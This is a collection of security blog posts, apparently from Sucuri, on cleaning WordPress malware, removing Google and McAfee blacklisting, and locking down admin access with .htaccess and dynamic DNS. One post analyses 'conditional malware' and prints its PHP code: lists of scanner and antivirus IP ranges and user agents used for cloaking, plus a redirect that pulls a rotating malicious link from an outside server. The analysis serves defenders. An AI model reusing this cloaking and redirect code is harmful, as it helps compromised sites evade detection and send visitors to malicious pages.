Website Malware Removal – WordPress Tips & Tricks

We often write posts that give you advice and recommendations around how to harden your websites, and have only recently begun to give advice on ways to navigate your backend and remove infections via terminal. But what about all the basics?

That’s what I want to cover in this post. All those things that you should know when trying to remove web malware from your site.

Cleaning Basics


When working to clean your site there are a number of things you should know, I’ll wrap it into 4 key things:

  • Use Live Scanners
  • Default WP File Structure
  • File Permissions
  • Disabling Plugins

1. Use Live Scanners

Contrary to popular belief, utilizing web-based scanners are a necessity in this day and age. False positives are an acceptable risk in today’s fight against web-malware, they are much better than false-negatives. In other words, missing a possible infection.

So of course, there aren’t many live scanners out there on the market, none that are truly free and willingly give you a report without asking for a registration or payment of some kind:

Disclaimer: The scanner is not 100%, no AV type product should ever boast 100% certainty as it’s not possible in this domain. If it were, there wouldn’t be any competitors or service providers.

2. Default WP File Structure

What most don’t understand is how WordPress is organized by default, it’s an important distinction to make. In every install, there are core directories and files.

This is what a clean install looks like:

One option you have is to do your own integrity checkS by comparing your base install to the core install. As you might imagine, there is a way to do this via terminal, here is an example:

$ diff -r /Documents/WordPress/wp-includes /public_html/happysite.com/wp-includes

Why important?

It’s important because in more cases than most folks realize, you’ll want to replace your core install.

The reasoning is simple, from what we see, in a lot of infections once access is gained to the environment, backdoor payloads are pushed into the install directories. This allows the crackers to gain access to your environment directly. If you don’t have the ability to effectively scan every directory for known or new backdoors, then it’s good practice to replace the two core directories wp-admin and wp-includes.

Please note the emphasis on replace, not update. This is important because an update will simply overwrite the existing files, to replace the backdoor in a file, it will not purge the directory. This means if a backdoor resides in a non-root file the update won’t clear the issue.

Hint: SEO Spam is notorious for doing this.

3. File Permissions

The ever important file permissions. The WordPress.org Codex offers some very good advice on specific permissions for WordPress installs. You can find a good article on the Codex: Changing File Permissions

The biggest take-away is simple:

  • Directories: 755
  • Files: 644

There is a simple way to apply the changes via terminal:

Directories:
find [path to install] -type d -exec chmod 755 {} \;

Files:
Find [path to install] -type f -exec chmod 644 {} \;

But what about the non-terminal types?

No problem. Using your favorite FTP client you should be able to do it easily. In this instance I’ll show you in FileZilla. While I wouldn’t save the credentials in the client, I’d recommend this client for most trying to work in FTP.

What I particularly like about it is you can use this client across the three most common platforms (e.g., MAC, Windows, Linux)

To change the permissions for all directories it’s easy, simply log into your server and click on the directory for your web-files, it can be: www, publich_html, htdocs, httpdocs, etc…

Once at the directory, right-click and click on properties.

On the next screen you can type in 755 where it says Numeric value.

Be sure to also click Recurse into subdirectories and select Apply to directories only.

This will apply the 755 permission to all directories within the web directory

The good news is that the file permissions are just as easy. Simply follow the same steps as above, this time though you’ll type 644 and select Apply to files only.

As you can see, there is no real secret here. Simply follow the recommendations you are given.

Another important note to make is that in Filezilla you can easily see the permission of your directories and files by looking to the far right of the directory or file, see below:

4. Disable Plugins

Here is another good tip. When using a scanner, if you continue to struggle identifying the location of the infection, one very common place to look in is the plugins directory.

What most people don’t realize is that you have the option to disable the plugins directory. Don’t be fooled by the use of “disable”, it simply means you can’t use the plugins. One very easy way to do this is rename the directory:

Example: plugins – > plugins.backup

This will kill all your plugins rendering them useless to your website. The point of doing this is to see if the infection is tied to the plugins. If it is, you’ll see that the live scanners will show clean when you rescan. If this is the case, another very good trick is to narrow down the infection further by disabling one plugin at a time.

Yes, this works and it’s very easy to do for novices.

Note: No, renaming is not going to hurt your site. When you remove the name and reset to its default the site will be fully functional again.

If you disable plugins and the infection is still present then you know it’s one of the following: core files, themes files, or database. If you followed the steps in section 2 then you know it’s in either the themes or the database.


This post is not meant to be a technical overview of how to remove website malware, instead it’s meant to help you diagnose the location of infections which in turn help you locate and remove the infection. It’s fundamentally a different approach, but it’s intended to be so. Believe it or not, the most novice of users would be able to use these techniques to quickly narrow down infections.

If you have any questions please contact us at info@sucuri.net.

Website Malware Removal – Counter.php

There are many variations to the Counter.php malware floating around the interwebs. This is a malicious redirect that sends your readers to a known bad site, that site houses a payload that responds based on the incoming user-agent.

Check out Sucuri Labs for more variations of Counter.php


If you use our free SiteCheck Scanner you might see a display like this:

Read More

Website Malware Removal – Blackhole Exploit

Here is a quick little write up on how to to deal with one, of many variations, of the Blackhole Exploit.

The Infection


If you scan your site using Sucuri SiteCheck and find yourself with a result that looks like this:

Then you are dealing with an infection that is facilitated through the use of the Blackhole Exploit kit, the infection is classified as a Drive-by-Download type infection.

As the type implies, when someone visits a site with this payload, the infection will be initiated on visit and if the conditions are correct it will attempt to download something on your local environment. Hence the classification.

Another option you have, if you feel the site is functioning funny, is to leverage your terminal environment. On UNIX/LINUX based machines you have the option to use CURL as follows:

$ curl -D googlebot www.infectedsite.com

In this instance you’d see this:

Same infection as what was presented in the SiteCheck results.

The Removal Process


In this specific instance the infection was found across all the following files:

  • index.php

This includes the root, theme directory, plugins directory, admin and includes directories. Every one of those directories had an index file and each file was infected, I mention that to show the scope of the infection.

Hunt The Infection

If you have terminal access to the environment you can quickly identify every file infected by running the following:

$ grep -r ’72.81.840.918.256′ .

If you’re in a rush and your site is very deep, you could also push the results of the grep to a log file versus waiting for it to display and check back later:

$ grep -r ’72.81.840.918.256′ . > infectedsite-infection

This will create the infectedsite-infection file in the directory you are in. Once you have time you can come back and analyze the output:

$ cat infectedsite-infection

If you don’t have terminal, don’t sweat it, you can often download the entire install to your local environment and run it there too. When you’re satisfied you have found all the offending files simply push it back to your server.

Now Clean it Up

When you’re cleaning, you don’t have to be a coding rockstar, but you want to be aware of the little things. By little things I mean this:

  • If in a PHP file you’re going to need an opening tag, usually looks like this: ‹?php that will then be followed by a closing tag that looks like this ?›

In this instance, this was the most important to keep in mind.

As for the removal, when you look at the results in SiteCheck or your Curl results you see everything fits inside ‹script› and ‹/script›.

There are a few ways to automate the removal, but that won’t be covered here. The easiest way for you is to open the files from the steps above, find the infection, highlight, and delete.

Verify you don’t pick up any of the important characters I mentioned above.

Opening you have a few different options, you can use terminal editors or a local FTP editor (e.g., Codad, notepad, textpad, etc.. ). If you don’t want to mess with any of that, well then good news, simply sign up with us and we’ll take care of it for you.


Any questions or concerns with the post just let us know at info@sucuri.net.

Google Blacklist Warning: Something’s Not Right Here!

Google recently put out a post talking to the past 5 years offering the Safe Browsing program and summarized in a post titled: Google Safe Browsing Program 5 Years Old – Been Blacklisted Lately?

This got us thinking about the number of Google warnings end-users see every day, and naturally we couldn’t help but take some time to help provide some context around the different warnings and what they mean.

Today it seems there are 5 little words that all end-users are quickly learning to fear when it comes to owning a website:

Courtesy of Chrome

It’s important to note that every browser displays the warning a bit different. Very frustrating to us and clients, but good to recognize.

Courtesy of Firefox

Courtesy of Safari

What Does it Mean?

What most don’t realize is that Google has a number of different warnings and they don’t all mean the same thing. If you are greeted with one of the warning splash pages above, that’s what it is, your site is infected and you should be concerned. This page is reserved to warn all users visiting your site that Google has in fact confirmed that your site is either (1) distributing malicious software, whether via drive-by-downloads, social engineering attacks, etc.. or (2) redirecting users to malicious domains or IP’s that are in turn distributing malicious software.

I know, nothing screams panic more than a page that is bright RED and forces your client to click proceed anyway or ignore warning to access your website. It’s like saying:

Hey, you’ll likely get mugged if you go in that alley.

The odds of your clients and readers disregarding the message is growing less likely every day. What makes it worse is that Google offers an API that most Anti-Virus leverage. This API is updated with the state of your site in the Google Safe Browsing program. What this in turn means is if your site gets blacklisted, that is then pushed to the API, which in turn is reported by AV’s. In short, if your client is using a product from one of the AV’s that too will warn the user that something is wrong.

Now, its easy to say, “buy our product to avoid what is quickly being recognized as the web’s scarlet letter A,” but in addition to saying that, we want to raise awareness around what you can do if you in fact find yourself with this problem.

Know The Warning


The first thing to understand is to know what warning you are seeing. There are three types of warning Google releases. They include:

  • Malicious Software (Malware)
  • Suspicious Activity
  • Phishing

Malicious Software (Malware)

Perhaps the easiest to identify. They are all the warnings posted above. They are usually red splash pages and annoying as heck, what’s worse is they have this way of significantly impacting your websites traffic.

Suspicious Activity

Most don’t realize this but when you use Google search all the results you see are known as Search Engine Result Pages (SERPs). If Google detects something it feels to be inconsistent with your site it will display a little warning titled:

This site may be compromised!!

This is perhaps the most frustrating because unlike Malware and Phishing attempts, it’s treated differently. It’s Google saying it thinks something is amiss. You’ll often find this warning on sites with the Pharma Hack. Please understand though clearing this warning can be painful as the process is slightly different than its blacklisting counterparts.

Phishing

If you read our post on the past 5 years with Google’s Safe Browsing program you’ll notice an interesting trend where Phishing attempts are increasing while malware is decreasing according to Google. With that, it’s only appropriate for Google to put together yet another glaring splash page to warn its users of something being wrong. If you find yourself curious as to how Phishing scams work HowStuffWorks offers a good and easy to understand description.

With an understanding of which warning you ware being flagged with, and yes it could be all three, you can then put together an appropriate course of action.

Course of Action


The really good news is that its only temporary. We get this question a lot, “Is this going to be there forever?” The answer, fortunately, is no. It’s a temporary warning to the users of the site and if you take appropriate actions it’ll be removed. The first thing to know are the various sites you’ll need:

Here is a quick tip:

You don’t have to hire a company like Sucuri to have these warnings removed.

No company has an advantage over the other getting your site cleared by Google. Google is the only one with the ability to reindex and make the final determination on the state of the site. This means if you are able to effectively clear the infection then there is nothing stopping you from submitting for reconsideration on your own.

Here is another quick tip:

When dealing with Google warnings the best place to go to know the status is Google. Do not depend on Scanners as they use the Safe Browsing API and that is often delayed.

With this information in hand you can now work to assess where the issue is. It’s often in your interest to work to identify the issue before submitting it for reconsideration, not doing so will simply leave you stressed and frustrated. Its important to note that sometimes though, Google does make mistakes, and it could be a false positive.

Step 1. Use Live Scanners / Online Tools

Contrary to popular belief, not all scanners are created equal. More often than not, scanners use some level of caching and/or require you to subscribe to a service to get an output worth anything. Make use of free scanners where possible:

Live scanner:

These free scanners are not 100% accurate, its practically impossible. In reality, no remote service is 100% accurate. If they were, there wouldn’t be a need for any other vendors. That being said, its good to note that some malware types are conditional and present themselves only when specific rules are met. Read more on one of our recent posts, Understanding Conditional Malware – IP Centric Variation. To account for this you can use a number of tools to emulate different conditions in the hopes of replicating the issue.

Online tools:

The idea is try to figure out what might have flagged the issue in the first place. Using the Google Bot option is always good as it will display the site as it is being seen by Google. This is especially important for those infections that target Google IP’.

Step 2. Remove the Issues

As in most things, knowing is only half the battle. Now that you know you want to go in and remove the issue.

Please have a basic understanding of coding syntax, the last thing you want to do is blow up your site all because you deleted a closing bracket.

Please also note that the infection may be encoded, encrypted, concatenated or a little bit of everything. In other words, what you see via the web might not be what you see when you log into your server. With that being said there are a few known places you can always look when hunting down issues:

Some of the more common places to look when dealing with drive-by-downloads:

  • Footer
  • Header
  • Index (php or html)
  • template files

More common places for malicious redirects include:

  • .htaccess
  • index (php or html)
  • Core Files

When dealing with Phishing attempts:

  • New Directories
  • HTML files
  • Index (php or html)

Another good tip is that although Google Webmaster Tools might say myhapylizard.html and mykidsplaying.html are showing infected, in reality its the core file generating the content for those files that is the culprit. Looking only at those HTML files is not going to bear you much fruit. Look at the files generating the template for that page, there you’re likely to find the root of the problem. You’ll also want to know what your website is built on. Is it using a CMS like WordPress, Joomla, Durpal, or osCommerce? Is it custom?

If you’re familiar with the command line interface (CLI) you can also try using a few different commands.

Emulate user agents:

$ curl -A “Mozilla/5.0 (compatible; MSIE 7.01; Windows NT 5.0)” http://www.somesite.com

Where you can switch out the agent MSIE 7.0; Windows NT 5.0 at your leisure. It’s always good to check IE as it’s one of the more likely targeted browsers. If you go online and try searching for user agents it could be a bit overwhelming. As you get familiar with them, here is a sweet little list that will help you get going. Simply replace the content in the user agent section of the cURL command.

You can also use cURL to emulate a number of bots and other crawlers.

Emulate bots:

$ curl –location -D – -A “Googlebot” somesite.com

If you’re wondering why you would ever use cURL in the place of your browser, the answer is simple, you don’t want to visit a compromised site and run the risk of compromising your own environment. You’re going to want some understanding of how your website was developed and a basic understanding of HTML at a minimum. To help you out, you’re looking for things that might have something like the following:

  • iframe
  • script

You’re also going to look for things that don’t make sense:

  • Is your site English, but you see Russian writing? Or any language not your own?
  • Do you see long strings of incomprehensible content?

Once you do that you’ll want to become friends with grep. Sample use would be:

$ grep -r ‘[something of interest]‘ .

Grep is extremely powerful and allows you to crawl your entire environment. It allows you to pick out pieces of text and search for it in every file on your server. Be sure to check out the 15 tips on how to use the command. Another good resource to help you get acclimated in the terminal environment includes this free online resource.

Step 3. Submit For Review

If you made it through Step 2 then you’re likely pretty pumped right now, and you should be. Only thing left to do is submit to Google for reconsideration. Regardless of which warning you’re fighting with, you’re going to do some type of reconsideration submission. For all of them, you’ll need to log into Google Webmaster Tools and verify your site.

For malicious software (Malware) and Phishing warnings you will submit the reconsideration request via Google Webmaster Tools by:

  1. – Add Site
  2. – Verify Site
  3. – Click on Health option – Hint: Left side table of content
  4. – Click on Malware – Hint: If being flagged for Phishing or Malware you’ll see a yellow / orange warning on the page when you click
  5. – Click to submit a review

For suspicious activity you’ll follow these steps:

  1. – Add Site
  2. – Verify Site
  3. – Go to the Reconsideration Link
  4. – Select your site from the drop down
  5. – Fill in the input boxes, provide as much information as possible

After both, the best thing you can do is sit back and wait. This is a patience game. In most instances you’ll see an update within 10 hours, but in some instances it has been known to take days if not weeks (rarely). Also, be sure to keep an eye on your Google Webmaster account, you’ll see update notices there and in your email.

If you get to the point where you have exhausted all your resources and can’t manage to get the infection removed, then it’d be in your interest to engage with a malware remediation company like Sucuri. If you decide on another provider, that’s ok too, be sure to read our Ask Sucuri: What should I know when engaging a Web Malware Company? post.


If you have any questions on the content in this post please feel free to leave a comment or send us an email at info@sucuri.net .

How To: Lock Your Site by Enabling a Second Layer of Authentication

I put together a post this weekend about my personal experience installing a WordPress site on a clean Server. In the process of hardening the administration panel I found myself doing something that I don’t see discussed much – enabling Basic Access Authentication.

That got me thinking about a putting together this post which will help educate our readers on a quick and easy method that can help add a second layer of authentication to their own administrative panels. What’s great about this is it can be applied to any web application that is running on an Apache HTTP Server, those platforms include:

  • WordPress
  • Joomla
  • Drupal
  • osCommerce
  • and more…


Read More

Understanding Conditional Malware – IP Centric Variation

In today’s web malware landscape you can’t help but take a minute to familiarize yourself with a concept known as conditional malware.

As implied in the name, it’s malware that only works when specific rules are met. Those rules can range from specific IP ranges to time of day. They are very tricky and as you would expect, evolve every day. Often when someone calls or sends us an email asking why we’re not picking something up on our free scanner, SiteCheck, that’s usually the case. As of late, the PHARMA hack is being notorious for the use of conditional type infections making it exceptionally difficult to detect via HTTP.

In this post we’ll take a look at a specific type of conditional malware that is applying specific rules around which IP’s it will not display to. It’s the same string that we wrote about earlier causing us to flag Google.com as malware.. oops..:)

My goal is to keep it high level, not going to get crazy with the code, but I do want to take some time to walk through it so that you can learn to detect similar infections in your environment.

Dissecting The Code


User Agents

The first thing you notice when you see the infection is the use of $user_agent_to_filter. This is telling the code to dispaly if it comes from any one of those user agents:

$user_agent_to_filter = array( ‘#Ask\s*Jeeves#i’, ‘#HP\s*Web\s*PrintSmart#i’, ‘#Safari#i’, ‘#HTTrack#i’, ‘#Chrome#i’, ‘#Mac#i’, ‘#IDBot#i’, ‘#Indy\s*Library#’, ‘#ListChecker#i’, ‘#MSIECrawler#i’, ‘#NetCache#i’, ‘#Nutch#i’, ‘#RPT-HTTPClient#i’, ‘#rulinki\.ru#i’, ‘#Twiceler#i’, ‘#WebAlta#i’, ‘#Webster\s*Pro#i’,’#www\.cys\.ru#i’, ‘#Wysigot#i’, ‘#Yahoo!\s*Slurp#i’, ‘#Yeti#i’, ‘#Accoona#i’, ‘#CazoodleBot#i’, ‘#CFNetwork#i’, ‘#ConveraCrawler#i’,’#DISCo#i’, ‘#Download\s*Master#i’, ‘#FAST\s*MetaWeb\s*Crawler#i’, ‘#Flexum\s*spider#i’, ‘#Gigabot#i’, ‘#HTMLParser#i’, ‘#ia_archiver#i’, ‘#ichiro#i’, ‘#IRLbot#i’, ‘#km\.ru\s*bot#i’, ‘#kmSearchBot#i’, ‘#libwww-perl#i’, ‘#Lupa\.ru#i’, ‘#LWP::Simple#i’, ‘#lwp-trivial#i’, ‘#Missigua#i’, ‘#MJ12bot#i’,
‘#msnbot#i’, ‘#msnbot-media#i’, ‘#Offline\s*Explorer#i’, ‘#OmniExplorer_Bot#i’,
‘#PEAR#i’, ‘#psbot#i’, ‘#Python#i’, ‘#rulinki\.ru#i’, ‘#SMILE#i’,
‘#Speedy#i’, ‘#Teleport\s*Pro#i’, ‘#TurtleScanner#i’, ‘#User-Agent#i’, ‘#voyager#i’,
‘#Webalta#i’, ‘#WebCopier#i’, ‘#WebData#i’, ‘#WebZIP#i’, ‘#Wget#i’,
‘#Yandex#i’, ‘#Yanga#i’, ‘#Yeti#i’, ‘#msnbot#i’, ‘#spider#i’, ‘#yahoo#i’, ‘#jeeves#i’ ,’#google#i’ ,’#altavista#i’,
‘#scooter#i’ ,’#av\s*fetch#i’ ) ;

Filtering IPs

The next you notice is there long array of IP’s. In essence, if you contain an IP that equals their value or even fits within the range a different action will occur. How nice of them to actually comment on those ranges that belong to search engines and AntiVirus providers.

$stop_ips_masks = array(
“66\.249\.[6-9][0-9]\.[0-9]+”, // Google NetRange: 66.249.64.0 – 66.249.95.255
“74\.125\.[0-9]+\.[0-9]+”, // Google NetRange: 74.125.0.0 – 74.125.255.255
“65\.5[2-5]\.[0-9]+\.[0-9]+”, // MSN NetRange: 65.52.0.0 – 65.55.255.255,
“74\.6\.[0-9]+\.[0-9]+”, // Yahoo NetRange: 74.6.0.0 – 74.6.255.255
“67\.195\.[0-9]+\.[0-9]+”, // Yahoo#2 NetRange: 67.195.0.0 – 67.195.255.255
“72\.30\.[0-9]+\.[0-9]+”, // Yahoo#3 NetRange: 72.30.0.0 – 72.30.255.255
“38\.[0-9]+\.[0-9]+\.[0-9]+”, // Cuill: NetRange: 38.0.0.0 – 38.255.255.255
“93\.172\.94\.227″, // MacFinder
“212\.100\.250\.218″, // Wells Search II
“128\.103\.64\.[0-9]+”, // StopBadWare
“150\.70\.[0-9]+\.[0-9]+”, // TrendMicro
“216\.104\.[0-9]+\.[0-9]+”, // TrendMicro
“207\.46\.[0-9]+\.[0-9]+”, // Microsoft
“157\.55\.[0-9]+\.[0-9]+”, // Microsoft
“213\.180\.[0-9]+\.[0-9]+”, // Yandex
“217\.23\.[0-9]+\.[0-9]+”, // Kaspersky
“91\.103\.64\.[0-9]+”, // Kaspersky
“215\.5\.80\.[0-9]+”, // Kaspersky
“195\.168\.53\.[0-9]+”, // NOD32
“220\.255\.1\.[0-9]+”, // domain-tool.com
“69\.28\.58\.[0-9]+”, // Symantec
“66\.147\.244\.[0-9]+”, // freepcsecurity.co.uk
“128\.111\.48\.[0-9]+”, // wepawet.cs.ucsb.edu
“209\.9\.239\.[0-9]+”, // jsunpack.jeek.org
“62\.67\.194\.[0-9]+”, // support.clean-mx.de
“195\.214\.79\.[0-9]+”, // support.clean-mx.de
“97\.74\.141\.[0-9]+”, // malwareurl.com
“213\.171\.194\.[0-9]+”, // spamhaus
“139\.146\.167\.[0-9]+”, // malwaredomains
“88\.160\.229\.[0-9]+”, // malwaredomains
“69\.162\.79\.[0-9]+”, // malwarebytes
“66\.40\.145\.[0-9]+”, // bitdefender
“66\.223\.50\.[0-9]+”, // bitdefender
“204\.14\.90\.[0-9]+”, // spywarewarrior.com
“92\.123\.155\.[0-9]+”, // Sophos
“213\.31\.172\.[0-9]+”, // Sophos
“143\.215\.130\.[0-9]+”, // Malwaredomainlist
“150\.70\.172\.[0-9]+”, // TrendNet
“64\.88\.164\.[0-9]+”, // AVG
“102\.157\.192\.[0-9]+”, // ZeusTracker
“109\.65\.41\.[0-9]+”, // ZeusTracker
“110\.77\.248\.[0-9]+”, // Virustotal
“59\.6\.145\.[0-9]+”, // Virustotal
“67\.124\.37\.[0-9]+”, // Virustotal

The Rule (a.k.a. The Condition)

If Condition is Met, then..

Then once the user agents have been defined and the “bad” IP’s flagged, you then have the condition. In this instance what it is saying is if any of the IP’s fall within those identified above redirect them to http://www.google.com. How annoying is that!!!!

foreach ( $stop_ips_masks as $k=>$v )
{
if ( preg_match( ‘#^’.$v.’$#’, $_SERVER['REMOTE_ADDR']) )
$is_bot = TRUE ;
}
if ( $is_bot || !( FALSE === strpos( preg_replace( $user_agent_to_filter, ‘-NO-WAY-’, $_SERVER['HTTP_USER_AGENT'] ), ‘-NO-WAY-’ ) ) )
{

header(“Location: http://www.google.com/”);
die();

If Condition is Not Met, then…

Now that we know what it does if the condition is met, let’s look at what it does if the condition is not met.

set_time_limit(30);

$cache = dirname(__FILE__) . ‘/link.cache’;

$link = @file_get_contents($cache);

if (strlen($link) < 20 || (time()-@filemtime($cache)) > 60)
{
$link = @file_get_contents(‘http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626′);

if (strlen($link) > 20)
{
$fp = @fopen ($cache, ‘w’);
@fputs($fp, $link);
@fclose($fp);
}
}

header (‘Location: ‘ . $link);
exit;

As you can see, if the condition is not met then the incoming request continues down the the yellow brick road and finds at a new domain courtesy of this:

@file_get_contents(‘http://88.198.28.38/api.php?action=link&aid=658&fid=3714&hash=beca79b043b1b5e25d514191ce8a691c291b8626′);

That little API defines which URL to share with the request. It actually rotates the domains so if you hit it multiple time you’re not likely to get the same one.

What Did We Learn


Hopefully you gained an appreciation for what conditional malware is all about and the challenges with catching it via HTTP crawlers.

This specific instance only talks to one type, there are varying permutations of this floating the interwebs. If you’re a client, we highly recommend enabling the server-side scanner as it’s not restricted to the limitations found with HTTP crawlers.

A couple of tale tell signs that something is wrong is if you start getting comments like this:

  • I am being redirected on my mobile device but not your machine
  • I am being redirected on my Chrome broswer but not in Firefox
  • I remember seeing something a day agao but now its not there

Keep an eye out for questions or comments that resemble any of those points, if you hear them you now know that you’re likely dealing with some type of conditional malware.


If you have any questions pertaining to this post please feel free to email us at info@sucuri.net.

How To: Stop The Hacker By Hardening WordPress

Every day we service 100′s of clients and the question is always asked:

How do you stop these hackers!!!”

Unfortunately, it’s perhaps the hardest to explain and understand for most. That being said, this post will be one of a series that talks to what end-users can do to help reduce their threat landscape.

This post will augment our previous post, Ask Sucuri: “How to Stop The Hacker and ensure Your Site Is Locked!!”, but hopefully provide you more tangible take-away’s. It will also leverage guidance recently shared at a conference for WordPress enthusiats – WordCamp Orange County 2012.

The Presentation


Here is the presentation in its entirety. Very appropriately, it’s titled WordPress Security – Knowledge is Power, mainly because of the emphasis we put around empowering the end-user with as many tools as possible to make them more effective at protecting themselves.

Give a man a fish and you feed him for a day. Teach a man to fish and you feed him a lifetime. – Chinese proverb


Read More

How To: Lock Down WordPress Admin Panel With a Dynamic IP

There is often a lot of discussion around locking down access to WP-ADMIN and WP-Login.php, specially around restricting it by IP. The issues and retort that often comes up is, “but what if I have a dynamic IP?” Right away the response from folks is, “oh, well then this won’t work for me.” It didn’t click at the time, but then it hit us, that doesn’t make any sense.

This post will teach you how you can lock down access to WP-ADMIN and WP-Login.php by domain name, instead of by IP. Giving you the same level of protection that you would expect if restricting by IP.

Using .HTACCESS


The first place you will start is inevitably .HTACCESS. The basic commands you insert are the following:

Lock Down Log In Page

This is often dropped in the .HTACCESS file at the root of your install. This small snippet is often what you would write:

#Secure Access to WP-LOGIN.PHP by IP
<Files wp-login.php>
Order Deny, Allow
Deny from All
Allow from [Your IP]
</Files>

One very small change and we’re off to the races with domain names in the place of IP:

#Secure Access to WP-LOGIN.PHP by Domain Name
<Files wp-login.php>
Order Deny, Allow
Deny from All
Allow from [Your Domain Name]
</Files>

Yes, a domain name, don’t worry it’ll make more sense as we go through this post.

Lock Down WP-ADMIN Access

The key here is to place this .htaccess inside the WP-ADMIN directory. This small snippet is often what you would write:

# Secure Access to WP-ADMIN by IP
<FilesMatch ".*">
Order Deny, Allow
Deny from All
Allow from [Your IP]
</FilesMatch>

One very small change and we’re off to the races with domain names in the place of IP:

#Secure Accesss to WP-ADMIN by Domain Name
<FilesMatch ".*">
Order Deny, Allow
Deny from All
Allow from [Your Domain Name]
</FilesMatch>

Yes, a domain name, don’t worry it’ll make more sense as we go through this post.

What do you mean Domain Name?

So this is where it gets fun and we have not heard many people chat or writ about it in this community. As we know, a domain name is nothing more than a human readable format for an IP, which is what DNS servers use to map out everything and anything that touches the internet. So the idea is a simple…

Use a domain name to identify with your local machine. But how is this done you ask. Simple. You use a service that binds a domain name with the IP on your local environment. Uh…

Using a Dynamic DNS Manager

If you’re still scratching your head, don’t fret, we’re going to walk you through the process here so that you don’t have to give it my thought.

This is what you have to do…

Step 1. Sign up with a Dynamic DNS Manager

Again, nothing to be concerned with there, you’re not looking at spending $100′s. There are actually a number of free services available to you, they include:

The rest of this post will focus on Afraid.org, mainly because the name is cool and it works very well. Please, don’t be weary of the presentation of the site, their strong suit obviously is not user experience or branding, but that’s ok, because it works.

You can sign up by following this link: http://freedns.afraid.org/signup/

Once you’re logged in, you’ll see the following:

Once sign up you’ll have to wait for the verification email before you can commence using the system.

Step 2. Configure Your Domain

Once you get the verification email, you can follow the link it provides and open a new session. The new page will have a link in the middle that says Add a subdomain.

Go ahead and Add a subdomain.

The interface it presents you with is pretty straight forward.

The three areas you want to focus on include:

  • Subdomain
  • Domain
  • Destination

You really don’t need to understand this, but what its doing is giving you a free subdomain on any one of the available public domains (i.e., the domains in the drop down list).

So from this example I have selected the following:

  • Subdomain – testsubdomain
  • Domain – Mooo.com
  • Destination – 1.1.1.1

It should look something like this:

Don’t worry about placing too much emphasis on the Destination. I just set it at 1.1.1.1 because it’ll be updated later my your machine. In short, this is the IP that gets applied to the domain.

In case you didn’t catch it, my new domain is testsubdomain.mooo.com.

Once you have that, click Save.

Step 3. Configure with your Local Machine

This is by far the easiest step, although all the steps have been simple.

Simple click on Dynamic DNS in the left hand table of contents. Your screen should look something like this:

Once here, you have a couple of options, but the easiest once I like is using the Direct URL option.

When you click it, it’ll not open in a new window so be sure to use command + left click or control + click so that it opens in a new window.

Doing that then takes the IP of your local machine and applies it to the domain. So if your local IP is 173.56.201.45, the IP of the domain now becomes 173.56.201.45. This is key if you think back to the .htaccess configuration changes recommended above.

Step 4. Save URL

Might go without saying, but be sure to save the Direct URL link.

You will use this link every time your local IP changes.

Step 5. Update .HTACCESS

Now that you have now set up a domain to correspond with your machine, it’s on you to go back into your code editor and update it to filter not by IP, but by domain.

So looking at the recommendations above, they would now look something like the following:

Protecting wp-login.php:

#Secure Access to WP-LOGIN.PHP by Domain Name
<Files wp-login.php>
Order Deny, Allow
Deny from All
Allow from testsubdomain.mooo.com
</Files>

Protecting WP-ADMIN Directory:

#Secure Accesss to WP-ADMIN by Domain Name
<FilesMatch ".*">
Order Deny, Allow
Deny from All
Allow from testsubdomain.mooo.com
</FilesMatch>

Couple Important Take-Aways


First, this is a really easy way to save money, better secure access to your administrator panel and better work with dynamic IP’s.

Second, this will work with any machine you have. If you are like me and have several machines this is key. I have a desktop that I use at home and one that I travel with and several others that I test on. This gives me the flexibility to be as mobile as I need to be. Whether in Canada, US or Brazil, I am always able to access my information by updating the IP for the domain.

Third, this now becomes as crucial a piece of information as your username and password. Do not share your link and / or domain name. Treat your access to the DNS Manager as important, ensure you’re following good practice for creating and managing your access credentials.

Fourth, although I talk specifically to WordPress, this is something that can be applied to a wide array of authentication needs. It can be used internally to restrict FTP, SFTP, SSH access and it can also be used on any number of available CMS’s.


As always, feel free to contact us or comment if you have any questions or concerns. You can always email us at info@sucuri.net

How To: Remove McAfee SiteAdvisor Blacklisting

As more and more blacklisting authorities come online it becomes important to understand how to go about submitting your site for a review. The most recent challenge has been figuring out how to go about getting a site off the McAfee SiteAdvisor solution.

You can read more about what SiteAdvisor is here: http://www.siteadvisor.com/howitworks/index.html

What’s really important to note is that we have recently started leveraging their API in our own SiteCheck. So if you run your site and it shows BLACKLISTED it’s always good to click on the Blacklisting Status tab. The tab will show you a similar image to the one found here:

When blacklisted, the blacklisting authority will be highlighted in RED in the image above.

Please do make note that as we use their API, we have to wait for it to be updated so that it will reflect in our scans. Same as most other scanners leveraging similar API’s.

The Process

1. Verify Clean

So obviously, the very first step is to make sure the site is clean. Not doing so will just lead to very high level’s of frustrations. Can it be a false positive? Yup, sure can. But if you submit continuously and they respond with no update, then you might have a problem.

Yes, even if the other authorities haven’t flagged it. If there was one provider that covered 100% of the spectrum, well then there wouldn’t be any need for any one else.

2. Submitting For Review

This is perhaps the most challenging part we found. Unlike Google and Bing, or even Norton, there is not webmaster tools like solution. At least none that we can find. But there is this very hidden link that you have to go searching for: http://www.siteadvisor.com/userfeedback.html

At first glance it doesn’t look like much, just a random form, but the there is one drop down of particular interest, Type of Inquiry. You’re going to want to choose the Submit a site for (re)testing option. I know, not very eloquent, but seems to be the preferred method.

I’m still confused about the UserID: option, so we just leave it blank. Be sure to fill in the Your Name and Your E-mail fields though so that they have a way to contact you.

Turnaround Time

Like most authorities we’re seeing a 3 to 4 day turn around on average. Trust me when I say I wish it was faster, but its not, so be patient.


If you have any additional questions please contact us at info@sucuri.net.

3 Easy Steps to Make WordPress Updates Safer

With the release of WordPress 3.4 inching closer (could be minutes), we wanted to put together a quick post to help you towards a successful update.

WordPress

Here are a few areas to help you prepare for an easy update to the latest and greatest version of WordPress:

1. Backup your website

Updates in WordPress these days are easy and should be part of your management plan. This doesn’t apply just to WordPress core, but also for your plugins and themes. You want to make sure that you have clean backups of all these files in the event that something goes wrong during an update.

Some hosting providers provide backup mechanisms, but you may be looking for something a bit more manageable and flexible.

A good premium solution which takes the pain out of backups is using the popular plugin solution BackupBuddy

BackupBuddy

BackupBuddy will enable you to backup your entire WordPress installation to include widgets, themes, plugins, and your database. You have multiple options for off-site storing of your backups, and scheduling backups becomes a since.

If anything goes bananas, BackupBuddy includes restore capabilities that will have you up very quickly.

2. Research your plugins and themes

One of the reasons we hear often as to why a site manager refuses to update, or has major concerns with updating is they have had issues with their themes and/or plugins breaking at update time. Valid concern!

There’s ways to mitigate these types of issues. The first thing to do after you have backed up your website is to do a little research.

